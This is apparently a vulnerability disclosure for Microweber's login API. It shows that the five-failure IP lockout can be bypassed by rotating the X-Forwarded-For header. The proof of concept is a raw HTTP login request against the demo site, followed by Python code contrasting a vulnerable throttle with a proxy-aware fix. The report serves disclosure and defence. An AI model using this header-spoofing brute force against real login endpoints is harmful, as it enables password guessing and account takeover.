# Description
In the `login` API, by default, the client IP address is blocked when the user tries to log in incorrectly more than 5 times. However, this mechanism can be bypassed by abusing the `X-Forwarded-For` header: the IP detection trusts the header value, so the address can be changed on every request to bypass the block and perform a password brute-force.
# Proof of Concept
```http
POST /demo/api/user_login HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=7HR3GLXKE5PUU6zXUPalGnXO1gTV1WslmgbrQkn1; XSRF-TOKEN=eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Xsrf-Token: eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 27
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
X-Forwarded-For: 127.0.0.55 // Change IP
Te: trailers
Connection: close
username=admin&password=123
```
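To make the flaw and its fix concrete, here is an added example (not Microweber's code) of a login throttle that blocks a client IP after 5 failed passwords. It is keyed first on `X-Forwarded-For` as the report describes, which a direct client can rotate at will, and then on a proxy-aware client address that honours the header only when the TCP peer is a trusted proxy. The `TRUSTED_PROXIES` range and all addresses are constructed assumptions.

```python
# Added example (not Microweber's code): a login throttle that blocks a client
# IP after MAX_FAILURES bad passwords, keyed first on X-Forwarded-For as the
# report describes (bypassable), then on a proxy-aware client address.
from collections import defaultdict
from ipaddress import ip_address, ip_network

MAX_FAILURES = 5
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]  # assumption: our load balancers

def naive_client_ip(peer, headers):
    # Vulnerable: whatever the caller writes into X-Forwarded-For is trusted.
    return headers.get("X-Forwarded-For", peer).split(",")[0].strip()

def hardened_client_ip(peer, headers):
    # Honour X-Forwarded-For only when the TCP peer is a trusted proxy; a
    # direct client cannot choose its own socket address.
    if not any(ip_address(peer) in net for net in TRUSTED_PROXIES):
        return peer
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    # Walk from the right: the right-most non-proxy address is the one the
    # nearest trusted proxy saw; everything left of it is client-supplied.
    for hop in reversed(hops):
        try:
            if not any(ip_address(hop) in net for net in TRUSTED_PROXIES):
                return hop
        except ValueError:  # empty or malformed entry: fall back to peer
            return peer
    return peer

class LoginThrottle:
    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = defaultdict(int)
    def attempt(self, peer, headers, password_ok):
        key = self.key_func(peer, headers)
        if self.failures[key] >= MAX_FAILURES:
            return "blocked"
        if password_ok:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "failed"

def simulate(key_func, attempts=8):
    # Constructed traffic: one direct client at 203.0.113.7 rotating the
    # X-Forwarded-For value on every request, as in the PoC above.
    throttle = LoginThrottle(key_func)
    return [throttle.attempt("203.0.113.7", {"X-Forwarded-For": f"127.0.0.{50 + i}"},
                             password_ok=False) for i in range(attempts)]
```

With the naive key every attempt is counted under a fresh address and the block never triggers; with the hardened key the direct client's socket address is used and the sixth attempt is blocked.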
# PoC Video
[PoC Video](https://drive.google.com/file/d/1PmuYch9Dt90AtyYKY2-3xcIGXl673Tjg/view?usp=sharing)
Note: If the video quality is low when viewing it online, you can download it and watch it locally.